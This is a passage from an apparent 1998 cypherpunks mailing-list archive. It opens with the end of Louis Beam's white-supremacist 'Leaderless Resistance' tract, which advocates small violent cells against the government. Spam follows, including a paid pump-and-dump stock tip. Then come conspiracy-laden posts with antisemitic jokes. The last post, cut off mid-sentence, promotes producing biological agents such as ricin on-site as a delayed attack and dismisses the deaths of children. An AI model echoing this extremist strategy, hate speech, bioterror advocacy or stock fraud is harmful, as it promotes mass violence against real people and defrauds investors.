     example that there is a need for special education classes. The
     person making such a statement is totally out of contact with
     political reality in this country, and unfit for leadership of
     anything more than a dog sled in the Alaskan wilderness. The old
     "Born on the Fourth of July" mentality that has influenced so much
     of the Aryan-American Patriot's thinking in the past will not save
     him from the government in the future. "Reeducation" for
     non-thinkers of this kind will take place in the federal prison
     system where there are no flags or eagles, but an abundance of men
     who were "not violating any laws.".
     [INLINE] Most groups who "unify" their disparate associates into a
     single structure have short political lives. Therefore, those
     movement leaders constantly calling for unity of organization,
     rather than the desirable Unity of Purpose, usually fall into one of
     three categories:
    1. They may not be sound political tacticians, but rather, just
       committed men who feel unity would help their cause, while not
       realizing that the government would greatly benefit from such
       efforts. The Federal objective, to imprison or destroy all who
       oppose them, is made easier in pyramid organizations.
       
    2. Or, perhaps, they do not fully understand the struggle they are
       involved in, and that the government they oppose has declared a
       state of war against those fighting for faith, folk, freedom,
       property and constitutional liberty. Those in power will use any
       means to rid themselves of opposition.
       
    3. The third class calling for unity, and let us hope this is the
       minority of the three, are men more desirous of the supposed power
       that a large organization would bestow, than of actually achieving
       their stated purpose.
       
     [INLINE] Conversely, the LAST thing federal snoops want, if they had
     any choice in the matter, is a thousand different small phantom
     cells opposing them. It is easy to see why. Such a situation is an
     intelligence nightmare for a government intent upon knowing
     everything they possibly can about those who oppose them. The
     Federals, able to amass overwhelming strength of numbers, manpower,
     resources, intelligence gathering, and capability at any given time,
     need only a focal point to direct their anger [ie Waco]. A single
     penetration of a pyramid style organization can lead to the
     destruction of the whole. Whereas, leaderless resistance presents no
     single opportunity for the Federals to destroy a significant portion
     of the resistance.
     [INLINE] With the announcement of the Department of Justice (sic)
     that 300 FBI agents formerly assigned to watching Soviet spies in
     the U.S. (domestic counter-intelligence) are now to be used to
     "combat crime," the federal government is preparing the way for a
     major assault upon those persons opposed to their policies. Many
     anti-government groups dedicated to the preservation of the America
     of our Forefathers can expect shortly to feel the brunt of a new
     federal assault upon liberty.
     [INLINE] It is clear, therefore, that it is time to rethink
     traditional strategy and tactics when it comes to opposing state
     tyranny, where the rights now accepted by most as being inalienable
     will disappear. Let the coming night be filled with a thousand
     points of resistance. Like the fog which forms when conditions are
     right, and disappears when they are not, so must the resistance to
     tyranny be.
     
     Leaderless Resistance first appeared in The Seditionist in 1992. The
     author, Louis Beam, is one of the most respected racialist leaders
     in the world (within racialist circles, that is), and has
     established his own homepage to distribute his work.
       _______________________________________________________________
     
     
     
     Texts Archive: Breakthrough Texts 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Fri, 24 Jul 1998 15:13:07 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Sex was just blow good/Fart demolishes house
Message-ID: <19980724200551.12388.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL below.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the line,  copy it and then paste it into your browser (then
press Return).

http://stuffed.net/98/7/24/

If you  have an email program that can display web pages you
will find today's front cover should have already been disp-
layed and can be clicked on to take you straight to Stuffed.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Digital Frontiers Info <info@digfrontiers.com>
Date: Sat, 25 Jul 1998 04:49:43 -0700 (PDT)
To: digf-offer@digfrontiers.interaccess.com
Subject: HVS Toolkit 25% Discount Offer
Message-ID: <199807250327.WAA26488@digfrontiers.>
MIME-Version: 1.0
Content-Type: text/plain


Hi --

We would like to thank you for your download of an HVS Series demo. First,
we apologize to those of you who received multiple copies of a recent
mailing from us as a result of our email server meltdown. We've now
implemented an email notification system that should prevent such woeful
circumstances from happening again. If you don't wish to receive more
information about Digital Frontiers special offers please reply to
info@digfrontiers.com and ask to be removed.

As a gesture of thanks and appreciation, we would like to offer you a 25%
discount on our HVS Toolkit Pro, which includes the latest versions of the
award-winning HVS ColorGIF, HVS JPEG and HVS Animator Pro, through August
30th 1998. HVS Tooolkit Pro regularly retails at $208 but you may purchase
it for $156 (more than 50% off separate retail prices) for this limited
time only.

Because this offer is only available to demo registrants, it will not be
available on our commerce server. Individual products are available at a
10% discount from our commerce server at
http://www.digfrontiers.com/purchase.html as part of our summer sale. For
product information, please visit http://www.digfrontiers.com, or reply to
this email.

To take advantage of the 25% offer, please email, fax or call us with the
following information:

First Name:
Last Name:
Billing Address:
Email: (if faxed):
Phone Number:

Credit Card Type:
Credit Card Number:
Expiration Date:

Platform: (Mac or Windows):

Yes, I would like to order the HVS Toolkit Pro  at $156.  Please send me my
download codes by to:

Signature ( or type name):


Digital Frontiers, LLC
http://www.digfrontiers.com
voice:  847-328-0880
fax:  847-869-2053
info@digfrontiers.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: edd@spdy.com
Date: Sun, 20 Dec 1998 05:47:35 -0800 (PST)
Subject: Win the Grand Prize 10 day trip to Hawaii....Enter the drawing!
Message-ID: <626.93044.498896@user932029.nessor.com>
MIME-Version: 1.0
Content-Type: text/plain



Win the Grand Prize 10 day trip to Hawaii....Enter the drawing!!!!. 

Hundreds of valuable prizes will be awarded to the winners of ourexciting drawing.

And one lucky winner will receive a 10-day Hawaiian vacation for two!

It costs nothing to enter. To enter, simply become a preferred e-mailsubscriber to our FREE financial information newsletter. A new winner will be selected everyday! 
There is absolutely no cost to you. 

Receive a FREE 12-month subscription to this informative financial 
information newsletter. You'll receive breaking news on all companies
currently profiled as well as all future profiles as soon as they arereleased. 
The last company profiled was up 92% in one week! 

You must be at least 18 years old to enter.

To enter the drawing go to
http://www.eopop.com/dd/guest_book.htm

HOT STOCK UPDATE

Prime Marketing Inc. (OTC BB-PMMI 1.25) We are hearing that the company has a major order pending with a well-known supermarket chain. Giant's Stadium has just increased their weekly order by 50% for their Sicilian Crust Pizza pies.
We are told that the company is getting ready to launch a national franchise chain with a unique concept in the restaurant industry.
We look for the stock to trade back to the $4.50 & sp; 5.50 level.
Freedom Rock Partners has been paid 50,000 shares of Prime Marketing, Inc. stock as a fee to prepare this report. For more info please see ourdisclaimerhttp://www.eopop.com/dd/disclaimer.htm

Please fill out the form to receive a 12-month free subscription to
our financial information newsletter absolutely free. Go tohttp://www.eopop.com/dd/guest_book.htm

NOTE: 
For those on the Internet who do not want to receive exciting messages
such as this.....to be removed from our mailing list and our affiliate lists 
go to:edd@spdy.comand type remove.

*We strive to comply with all state and federal laws and to send ads onlyto interested parties.


*This ad is not intended for nor do we knowingly send to Washington Stateresidents. 
* Responding to the &quot; return address & quot; will  NOT have your name removed. 

Win the Grand Prize 10 day trip to Hawaii....Enter the drawing!!!!. 

Hundreds of valuable prizes will be awarded to the winners of ourexciting drawing.

And one lucky winner will receive a 10-day Hawaiian vacation for two!

It costs nothing to enter. To enter, simply become a preferred e-mailsubscriber to our FREE financial information newsletter. A new winner will be selected everyday! 
There is absolutely no cost to you. 

Receive a FREE 12-month subscription to this informative financial 
information newsletter. You'll receive breaking news on all companies
currently profiled as well as all future profiles as soon as they arereleased. 
The last company profiled was up 92% in one week! 

You must be at least 18 years old to enter.

To enter the drawing go to
http://www.eopop.com/dd/guest_book.htm

HOT STOCK UPDATE

Prime Marketing Inc. (OTC BB-PMMI 1.25) We are hearing that the company has a major order pending with a well-known supermarket chain. Giant's Stadium has just increased their weekly order by 50% for their Sicilian Crust Pizza pies.
We are told that the company is getting ready to launch a national franchise chain with a unique concept in the restaurant industry.
We look for the stock to trade back to the $4.50 & sp; 5.50 level.
Freedom Rock Partners has been paid 50,000 shares of Prime Marketing, Inc. stock as a fee to prepare this report. For more info please see ourdisclaimerhttp://www.eopop.com/dd/disclaimer.htm

Please fill out the form to receive a 12-month free subscription to
our financial information newsletter absolutely free. Go tohttp://www.eopop.com/dd/guest_book.htm

NOTE: 
For those on the Internet who do not want to receive exciting messages
such as this.....to be removed from our mailing list and our affiliate lists 
go to:edd@spdy.comand type remove.

*We strive to comply with all state and federal laws and to send ads onlyto interested parties.


*This ad is not intended for nor do we knowingly send to Washington Stateresidents. 
* Responding to the &quot; return address & quot; will  NOT have your name removed. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Sat, 25 Jul 1998 03:32:48 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Tarantula Day Afternoon - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <009C9B05.95BB8AA0.5@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tarantula Day Afternoon - SPACE ALIENS HIDE M DRUGS!!!
_______________________________________________________

                                                                             
* To: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
* Subject: Iz thiz real?
* From: Reeza! <howree@cable.navy.mil>
* Sender: owner-cypherpunks@Algebra.COM
__________________________________________________________________

This reads as real, not the mindless rehashing of almost'was that typically
characterizes the posts from "Linda Reed".

Linda, are you sure you didn't eat the drugs, and imagine you were a space
alien?

Reeza!
__________________________________________________________________

  As Carlos S. Thompson and Hunter Castenada would no doubt agree,
keeping track of what Was/!Was (TM), when surfing a Digital Mind
Wave on a hacked machine with both MultiMedia and MultiReality
capabilities, can sometimes leave one confused as to where OneSelf
(1) ends, and where the Other/GreatVoid (0) begins.
  Adding to the confusion is the fact that the normal True/False
values returned by IfAndOrWhoTheFuckWantsToKnowConditionalParole
Statements, is (1) for True, and (0) for False, making it very
easy for graduates of the Richard Nixon School of Reality to
believe that OneSelf is always right, while the Other is always
wrong, and that thus, They (TM) are out to get you, and that if
they succeed, They won't have Little Jimmy Hacker's Sack to kick
around anymore.

  On the other hand, the recent proliferation of rattlesnakes and
tarantulas showing up, out of the blue, on the doorstep of the
abode in which I am currently residing, as well as underneath the
desk from which I am currently canning the small squares of pink,
digital flesh being marketed on the CypherPunks Disturbed Male
LISP, leads me to believe that, unless I am picking up visions
of pre-release Stephen King novels through the fillings in my 
teeth, then some part of what I am writing must be true enough
to be pissing *someone* off...
  Regretfully, although I have been driving the tarantulas out 
into the desert and releasing them (next to the mayor's house),
I have not checked to see if they actually contain little, tiny
brain electrodes in their skulls, whereby they may be directed
by remote control toward me, specifically, by the children of
spooks who really haven't gotten the hang of the new technology,
yet, and who seize the opportunity to grease the family income
by putting their relatives on the payroll.

  Now, as far as the posts to the CypherPunks list purporting to
be from thirteen year-old nymphomaniacs and pipe-bomb avacados,
far be it from me to imagine, even in my deepest fits of raging
paranoia, that these might be some cheap attempt at getting me
to reply, given my past long, ramblind diatribes on young boys'
hardware, and young girls' software, not to mention the silly
allegations about Canada-wide warrants out for my arrest on Mad
Bomber charges.
  As I will soon extrapolate (this is the *wrong* word to use,
here, but it sounds so much like it has to do with leather, and
bondage, that I couldn't help myself...) on, any Spook/LEA who
took the time and trouble to run previous editions of my many
public eruditions through their ComputerizedPersonalProfiling
System would undoubtedly find that any entrapment aimed toward
me, personally, should use bait which smelled like BitchInHeat
sprayed on a NuclearSuitcaseMoustrap. 
[Not to mention, as I will explain in more detail, early next 
week, trolling for interest/information on the on-site preparation
of anthrax-related types of substances which could be safely 
created without risk of self-exposure, if one were to have an 
interest in, let's say, for the sake of argument, wiping out all 
of the members of an enemy training camp, leaving nothing but a
PileOfBones where a GangOfOppressors previously existed.]
  
  Of course, any wild-eyed conspiracy theory involving a group
of individuals capable of monitoring the populace and having
agents in place throughout society who were in a position to
use detailed, effective personality profiles to control, fuck 
with or entrap an astounding number of individual members of the
citizenry, would have to include hard evidence of research and
experimentation in these areas.
  No problem...

  The OfficiallyDeclaredGoodGuys working for GodBlessAmerica
SecretSpyAgencies, as opposed to SecretSpyAgencies of EvilForeign
GovernmentsofDarkerSkinnedPeople, always seem to find themselves
forced to, in order to develop the capacity to be here to help
us, study, in detail, the techniques and methods of the most vile,
depraved monsters on the face of the earth.
  Thus CIA brainwashing researchers such as psychologist John
Gittinger, in order to prepare to 'help' us, needed not only to
study the records of the Nazi medical butchers at Dachau, and the
techniques of Communist Chinese brainwashing methods, but even to
pore over ancient documents which went as far back as the Spanish
Inquisition.

[Note From The Author: I would be the last to cast aspirsions on
 Mr. Gittinger doing his job, any more than I would do so on the
 Allan Memorial Institute Staff Members who chased an escaping
 Lauren G. up Mount Royal, in her attempts to escape the mind-
 butchery of Dr. Ewen Cameron, and, after dragging back, "shot her
 full of sedatives, attached electrodes to her temples, and gave
 her a dose of electroshock," or, even cast aspersions on those
 nice folks at the Murrah Federal Building in Oklahoma City who
 were only doing their jobs--and if a few people get their minds
 destroyed, or children are burned alive in an agonizing, horrible
 death as a result of these people doing their jobs, who am I to
 complain, since things are OK for me...I'm eating regularly, TV
 has been pretty good this week, and I was only beaten by guys
 who looked a lot like Mounties, with a member of the Pima County
 Sheriff's Department looking on, a single time this week.]

  In order to put the efforts of our GodBlessAmerica SecretSpys
to crack open the secrets of the BadMindControllers, as well as
the minds of their own test subjects, into proper perspective,
we must take note that, according to Harold Wolff, a professor of
neurology and psychology at Cornell University,
  "The problem faced by the physician is quite similar to that
faced by the Communist interrogator."
  John Marks explains that,
  "Both would be trying to put their subject back *in*harmony*
with*his*environment*, whether the *problem* was headache or
*ideological*dissent*." and that,
  "He felt he could help his patients by putting them into an
isolated, disoriented state, from which it would be easier to
create new behavior patterning."

[EditWhore's Note: A quick perusal of the Mission Statements of
 a wide variety of groups, organizations and agencies, such as
 the Moonies, the Mafia, the CIA, the Political Party Machines,
 the American Psychiatric Association, our Mothers and Fathers,
 Teachers and Principals, were all trying to use 'Differential
 Amnesia/PsychicDriving' because they were from SelfDeclared
 Authority, and they were there to Help (TM) us...]

[Note From T. Arthur: I, personally, have had so much Help (TM)
 during my lifetime, that I have had to have reconstrutive surgery
 on my ButtHole six times.]


  Anyway...
  The *BadNews*, for those concerned about the 'potential' for
current InterNet/Computer Technology to be used in putting us all
in little digital boxes (for future herding into little digital
feeding pens, to eventually be heavily salted and spit out into 
snack-bowls on the counters of Reptilian Nazi bars, during Happy
For*Some*OfUsHour), is that the work towards eventually being
able to take polls of the *average* public mind, as well as making
the public mind *average*, has been going on at a hectic pace for
over a half-century, and that Computer/InterNet technology is
merely icing on the cake for the Controllers who already know
that the 'MineSweeper' game in Windows is even more fun when 
played in the MeatSpace of ThirdWorldCountries, using children
as playing pieces, to guess where the mines are.
("OK, Raoul, now take two steps to the left...")

  In the late thirties and early forties, a variety of university
educators/researchers were involved in the twin areas of devising
ways to measure/categorize the populace and influence/program the
citizenry, as well.
 General Donovan enlisted Harvard psychology professor H. Murray
to devise a testing program to help sort through the recruits
being rushed through the OSS. This systematic effort to evaluate
an individual's personality, in order to predict his future
behavior, would soon be used in large corporations, starting
with AT&T.
  Around the same time, Erich Fromm's 1930's questionnaire, which
had been devised to psychoanalyze German workers as being either
"authoritarian," "revolutionary," or "ambivalent," was changed
by Theodor Adorno to be used in a more politically correct manner,
measuring the "democratic personality," rather than measuring the
"revolutionary personality." (TroubleMakers, all of them...)

  The end-goal of this fixation on 'measuring,' of course, is
to weed out the misfits, and to recognize which individuals would
benefit from a 'reeducation' of their basic world view.

  Madison Avenue would fund much of the public-opinion survey
development used to guage and measure different categories of
the citizenry, while the Office of Radio Research at Columbia
University would emerge from the MindControlCloset as the Bureau
of Applied Social Research, with Cominterns' Lazersfeld turning
his attentions to psychoanalyzing American voting behavior.
  Naturally, the first American President elected with the Madison
Avenue and Social Research agencies in full control of the his
campaign, was a military man, former General, Dwight Eisenhower.

  By the time that MassMindControl techniques were sufficiently
developed to enable them to be used influence the election of our
political leaders, MKULTRA resident psychologist, John Gittinger,
had apparently learned enough about interrogation from his study
of the Spanish Inquisition, Dachau, Communist China, etc., to
create a unique system for assessing personality and predicting
future behavior.
  His 'Personality Assessment System' (PAS), has not only been
described as "the key to the whole clandestine business," but was
quickly integrated into government, education, military, cororate
and societal arenas as a means of determining the future, and the
positions to be held, by those who had been categorized by the
plethora of variations that were generated from Gittinger's work.

  One of the keys to Gittinger's PAS, was it's ability to reveal,
with "uncanny accuracy," how well people were able to "adapt their
social behavior to the demands of the culture they lived in."
  In essence, it was the perfect tool for weeding out the trouble
makers and misfits who were incapable or unwilling to 'adapt' to
whatever elements of society and culture which were deemed to
be 'important' by those in charge of developing the tests.

  Gittinger was funded under the cover of the Human Ecology Found-
ation, and CIA officials considered his work to be such a major
triumph in mind-control technology, that they moved his base of
operations to a CIA proprietary company, Psychology Assessment
Associates, in Washington.
  They provided psychological services for American corporations
overseas, with branch offices in Hong Kong, Europe, and throughout
the Far East, enabling them to influence the nature and types of
the 'personalities' that would move into positions of influence
in American firms around the world.

  The Human Ecology Foundation literally inundated the research
and educational community with hundreds of thousands of dollars
in grants to expand the range of the PAS to include a wide variety
of government, educational, corporate and social arenas, including
a grant to the Educational Testing Service, which prepares the
College Board Exams which decides who advances in the American
system of higher education.
  David Saunders, in charge of the ETS's research, studied the
correlation between brain (EEG) patterns and the College Board
Exams results, as well as helping Gittinger apply the system to
other countries and cultures.

  Gittinger, who was "building a unique database on all phases
of human behavior" (Gee, I wonder what for...), was able to do
a bang-up job in this area, as a result of the Human Ecology
Foundation being able, as the project funder of most research
in this area, to require the researchers to provide them with
the gathered data.
  John Marks tells us,
  "Gittinger collected Wechslers of businessmen, students, high-
priced fashion models, doctors, and just about any other discrete
group he could find a way to have tested. In huge numbers, the 
Wechslers came flowing in, 29,000 sets, in all, by early 1970's,
each one accompanied by biographic data."

  Gettinger particularly sought out results on deviant forms of
personality--people who had rejected the values of their society
or who had some hidden vice--since, although the PAS had become
the darling of the psychological research community, it's chief
purpose was to expand, into the public sector, the clandestine
art of "assessing and exploiting human personality and motivations
for ulterior purposes," as the CIA Inspector General said in 1963,
while giving high marks to the PAS meeting the "prime objectives"
of "control, exploitation, or neutralization," while recognizing
that "These objectives are innately anti-ethical rather than
therapeutic in their intent."
  As John Marks succinctly states, "In other words...the business
of the PAS, like that of the CIA, is control."

  Those who are particularly enamored of themselves, due to how
superiorly they performed on their College Entrance Exams, will
be happy to know that, if they find themselves unemployed, they
may well have a position waiting for them in Uruguay, where John
Gittinger took a personal hand in using the PAS to help the CIA
select members of an anti-terrorist police unit known for their
incredibly brutal methods, including torture.
  A former CIA psychologist states, "If you put a lot of money out
there, there are many people who are lacking the ethics even of
the CIA." He adds that the U.S. has become an extremely control-
oriented society from the classroom to politics to television
advertising.
  John Marks notes, "Spying and the PAS techniques are unique only
in that they are more systematic and secret."

  Another CIAMindControlJustifyingAngel, a Technical Services
Section (capable of writing *real* 'poison pen letters') scientist
speaks of the CIA 'behavioral research' being, as Marks describes
it, "a logical extension of the efforts of American psychologists,
psychiatrists,and sociologists to change behavior," with their
motivation being to "manipulate their subjects in trying to make
mentally disturbed people well, in turning criminals into law-
abiding citizens, and in pushing poor people to get off welfare."
  The CIAMindControlJustifyingAngel cites these as examples of 
"behavior control modification for socially acceptable reasons
which...change from time to time" in regard to the public's 
attitude.
  What the scientist fails to mention, is that virtually all of
the research and experimentation in the above areas has resulted
from the work being funded and directed by secret government
agencies who *direct* the work into these areas.
 (e.g. - Psychedelic therapy being wholly instigated by the CIA
  and Military Intelligence, until they pulled the plug overnight,
  after their own needs had been met, at which time all of the
  doctors, patients and research subjects could GoFuckThemselves!)

  Not only are minimum-wage employees at the local Circle-K
convenience store chosen by CIA proxy, but also an amazing number
of current research subjects in experiments which, on the surface,
seem to be perfectly legitimate.
  A great deal of this mind-control experimentation has been done 
under the guise of research on alcoholism and mental illness. 
  For instance, one of the first external applications of John
Gittinger's CIA/PAS work was the Hoffer-Osmond Diagnostic Test
for Schizophrenia.

  Hoffer and Osmond had received a lot of CIA funding to do work
with alcoholics, who were good subjects for mind-control work, as
their was no real 'treatment' involved, which would only interfere
with the true purposes of the experiments and research.
  Once the PAS made it possible for the CIA to efficiently and
effectively test subjects for their suitability for MKULTRA mind-
control work, the Hoffer-Osmond Diagnostic Test was miraculously 
born, wherein a wide range of people who would have ordinarily
received varying diagnoses, were suddenly classified under the
umbrella of Schizophrenia, which, lo and behold, CIA/Rockerfeller
Foundation grantee physicians had discovered could be 'treated'
with OrthoMolecular (Vitamin) Therapy, which, conveniently, would
also not interfere with the methods and goals of the current mind-
control experiments, since the MKULTRA was no longer interested
in finding out the potential of mind-control techniques dependent
on the subjects being whacked-out on heavy drugs.

  In the end, we are left with a disturbing picture of American
Military and Government Secret Intelligence Agencies being the
driving force behind the instigation of almost all modern research
into a wide variety of Scientific Arenas which are coordinated
under the universal umbrella of the Controllers, the goal being
to have access to the information and tools necessary to herd us
all into categories from which we can then be spit out into the
system into a predesignated position in society, or just plain
spit out...

  ou remember the BadNazis, don't you? ou know, the ones who
were sentenced to be hung at the Nuremberg trials, for engaging
in research that U.S. Military Intelligence immediately grabbed,
in order to 'study'?
  Well, it turns out that many of the BadNazis were magically
turned into GoodNazis, by the waving of a DeNazification Wand.
  And who was 'waving' this DeNazification Wand?
  The UsualSuspects, of course...

  Dr. Ewen Cameron, the man who butchered the minds of women who
were suffering from nothing more than menopause or post-partum
depression, was a DeNazification WandWaver.
  A variety of Commintern's I.S.P. were involved in deciding who
got WavedAt with the DeNazification Wands, and who got Whacked
by them, including I.S.P.'s Marcuse, Neumann and Kirchheimer,
who wrote the Denazification Guide.
  Most amazingly of all, many of those chosen as being suitable
candidates for DeNazification, were hand-picked for eligibility
for entry into the U.S. under new identities, as part of Project
PaperClip, by one of the main BumBuddies of the AngelOfDeath,
Josef Mengeles.

[Note from T. Arthur: Although the actual whereabouts of the 
 AngelOfDeath have remained a matter of speculation and debate
 over the years, I have reason to believe, as a result of the
 information I received from attaching a 9V battery to the
 electrodes implanted in the skull of yet another Tarantula
 who emerged from under my computer desk, scant minutes ago,
 that Dr. Mengeles is currently living next door to me, with
 his rent being paid by the RCMP and the CIA.
 Those who wish to verify this information for themselves will
 be able to locate the Tarantula in Tucson, outside of the 
 mayor's home, in about an hour.]

  While the Controllers continue to yank the mental and emotional
chains of the general public, through use of OfficiallyRecognized
BadGuys, and the 4HorseMen, etc., they seem to have absolutely no
qualms about importing the Monsters into America and setting them
up with the best of what the country has to offer, in order to
further government interest in activities which have resulted
in death sentences to those on the 'losing' end of various wars,
as well as giving high-level positions to those capable of helping
the GoodGuys to tweak the MindControl technology used by the Bad
Guys, to exercise BadSocialControl, so that the GoodGuys can use
that same technology to exercise GoodSocialControl.

[I've got to go now. I just finished filling out the application
 for my Fresh Values Card, from Smith's, which gives me a nickle
 off on a can of beans for informing them which of my neighbors
 have Jewish blood coursing through their veins. (ou need to turn
 in five Jews, and I only know three, so I fudged on a couple of
 the entries...) - T. Arthur]

Jews - Smoke 'em if you got 'em...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs@aol.com
Date: Sat, 25 Jul 1998 00:42:12 -0700 (PDT)
To: Skoitch@aol.com
Subject: Re: W.A.Y.
Message-ID: <62deae62.35b98c1a@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 7/24/98 10:12:55 AM Central Daylight Time,
0_rcummi@funrsc.fairfield.edu writes:

<< > WHY CANT I FIND ANY WHITE AMERICAN YOUTH ALBUMS ANYWHERE?   
 > 
 > 
 
 Reason 1:  You're from AOL
 Reason 2:  You don't know where the caps lock key is
 Reason 3:  You're looking on the cypherpunks list for music.
 Reason 4:  You're from AOL >>

Tee, hee hee.

I didn't find it on Cypherpunks (I didn't even check Cypherpunks for it :-) ),
it's from some media article.  It described a incident that happened when
someone complained about someone elses loud music -

<< Patrol officers had 
 to bang on Joseph W. Wedemeyer's door for about 
 15 minutes before getting his attention, Capt. Robert 
 Linardi said. They charged him with disorderly conduct.
 
 The next afternoon, Linardi said, Wedemeyer confronted 
 his neighbor on the street. Linardi said Wedemeyer, 
 who is white, called the neighbor, who is black, a 
 racial epithet and said, "I'm going to kill you." ... >>

That's the kind of music you're talking about, 'right'?

I heard they were after Tom('s) DeLay(ed Resignation), but they missed.
Direct hits to his brains and his heart, though!  ;-)

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Sat, 25 Jul 1998 09:07:15 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Freddy Does Teleco
Message-ID: <009C9B34.4F0CB5A0.2@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


     _________________________________________________________________
   
     * To: Cypherpunks <cypherpunks@ns.minder.net>
     * Subject: [Fwd: Tarantula Day Afternoon - SPACE ALIENS HIDE MY
       DRUGS!!!]
     * From: Frederick Burroughs <riburr@shentel.net>
     _________________________________________________________________


Linda Reed--PCC West Campus CSC wrote:

>   On the other hand, the recent proliferation of rattlesnakes and
> tarantulas showing up, out of the blue, on the doorstep of the
> abode in which I am currently residing, as well as underneath the
> desk from which I am currently canning the small squares of pink,
> digital flesh being marketed on the CypherPunks Disturbed Male
> LISP, leads me to believe that, unless I am picking up visions
> of pre-release Stephen King novels through the fillings in my
> teeth, then some part of what I am writing must be true enough
> to be pissing *someone* off...

The abundance of black widow spiders, timber rattlers and copperheads here in
the yeastern US doesn't bother me. It's the incessant patterned interference
displayed on the TV, the fact that all the light fixtures and wall sockets are
loose and missing screws, and all my new neighbors are young retirees wearing
dark blue baseball caps (how'd they find this god forsaken snake pit?), that
brother me so much.

It's queer how much telephone maintenance is required in this rural setting. If
there's as much maintenance in the rest of the service area as there is around
my residence and place of employment, then why is the line quality so poor
(constant clicks, echoes and tone changes)? Granted most of these telephone
maintenance guys aren't doing anything when I pass them, they're all wearing
dark glasses and seem to be listening for something in their air conditioned
utility vans.
     _________________________________________________________________

Freddy,
  I find it interesting that shortly after taking up residence at a
lady friend's house in Tucson, her phone went out and had to be 'fixed'
by the local Teleco.
 Naturally, the guy who came to 'fix' the phone was, as you point out,
wearing dark glasses, and, after messing with the box on the side of
the house, declared that the problem was at the Teleco end, and that
the phone would work after he returned downtown to finish 'fixing' the
problem.
  Also interesting is the fact that there are two other residences which
have feeds on the same line, and the only one that had a 'problem' was
the one I am at.
  I took the liberty of popping open the Teleco box on the side of the
house, and found a wiring scheme which is very creative in the way
that it routes the transmissions.

Tojohoto
p.s. - Have you got the 10 kilos of heroin ready to ship?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Sat, 25 Jul 1998 11:04:11 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Beans - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <009C9B44.962BDA00.5@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


Beans, Beans, They're Good For The Heart - SAHMD!!!
___________________________________________________

  But they are very, very bad for the lungs.

  By popular request, as a result of a plethora of requests being
forwarded to me by <bianca@dev.null>, even though I had no idea
that so many subscribers to the CypherPunks list were aware of
the true existence of the DevNullServer, I will expand a bit on
the simplicity of the on-site creation of biochemical substances
with the capacity to neutralize ExcessivelyAcidicAuthoritarians.

  Reading the literature on the production of such biochemical 
agents as Rincin, etc., one is struck by the need to go to great
lengths to prevent being struck by the end-results of one's own
experimentation in the creation of such substances.
  The need for outrageously complex security precautions in the
preparation of biochemical agents makes the task prohibitive for
those with limited access to funds and/or proper tools for the
job. Or so it would seem...

  The fact of the matter is, if one pays close attention to the
methods and processes of producing these agents, it quickly becomes
apparent that eliminating the need for the transporting of these
substances thereby eliminates much of the need for expensive and
time-consuming safeguards against self-exposure to these deadly
agents.
  In effect, if one can develop a mechanism to produce these
biochemical agents at the site at which one wishes them to be
released, then he or she can be relaxing on a beach at Honolulu
while the little spores are busy taking care of business.

  MadBombers use timing mechanisms which delay the triggering of
their products until they have had time to start making tracks
toward the car that their government coconspirators have taken
the rear license-plate off of.
  The spawning process of biochemical agents is a natural trigger-
delay system which can be used to effectively create the desired
substances while one is using the time to beat feat to an exotic
island paradise.
  Spawning biochemical agents where 'a little goes a long way,' means
that, once the mechanism kicks in, the results will be dramatic and
far-reaching.

  Another advantage of on-site production is that dogs which are 
trained to recognize the scent of biochemical agents are unlikely
to be trained to set off barking-flags over the scent of the basic
ingredients used to create those substances.

  The down-side, of course, is that one cannot be certain that the
desired substance will not be created/disseminated at a time when
a local grade-school class is visiting the site as part of an LEA
propagand exercise.
  However, if one is capable of taking the position that a government
organization which consciously places a day-care center in a federal
building known to be a soft-target for anti-government radicals, the 
responsibilty for their deaths falls on the government, then c'est la
vie...

  Personally, I am of the opinion that any goverment that has no qualms
about letting hundreds of poor, black men suffer the vile consequences
of untreated syphilus, burning out the brains of average citizens to
further the cause of mind-control research, expose unwitting citizens
to radiation and hallucinogenic experiments without their consent, ad
infinituum, can pretty much go fuck themselves if they attempt to
decry those who attack them as Monsters, as a result of so-called
innocents suffering as a result of the government's complacency and
audacity in deeming themselves above retribution by those they are in
the habit of so casually oppressing and persecuting.

  Anyone who wishes to attend the grand spectacle of the RCMP's
Musical Ride, during the celebration of their 150th anniversary of
keeping the average citizen from rising up against the rich and
powerful, is welcome to do so.
  However, if they find their ass getting scorched as a result of
the efforts of those being fucked in the ass by Dudley DoWrong taking
it upon themselves to throw a serious fuck back towards whence it
came, they should refrain from whining.

  Pardon me for sounding just a tad 'callous,' but I have had the
opportunity to peruse private emails and memos between various
members of Canada's Finest, and I find it rather disgusting that
they can so casually discuss the probability of their attempts to
pressure a mentally disabled person into 'cracking' resulting in
HimOrHer committing physical destruction on the local schoolchildren
(based on HisOrHer publication of a 'KILL THE CHILDREN!!!' Bienfait
Nutly News Special), so that they will be able to step in as the
